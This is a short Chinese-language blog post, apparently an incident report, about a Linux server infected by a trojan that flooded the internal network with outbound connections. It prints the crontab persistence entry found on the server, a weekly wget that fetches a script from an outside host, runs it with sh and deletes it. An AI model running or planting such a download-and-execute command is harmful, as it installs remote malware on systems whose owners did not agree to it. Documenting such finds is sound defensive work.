From: Polin Wei
這幾天Linux伺服器有異常流量,可能被添加了一木馬惡意程式,該程式一運行便對外發起了大量的連接,導致整個內網癱瘓掉,該木馬防護的方式非常簡單,只是在Linux crond計時器裡加入以下任務:
[root@lnx tmp]# crontab -e
###@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
###@weekly wget -q http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
沒有留言:
張貼留言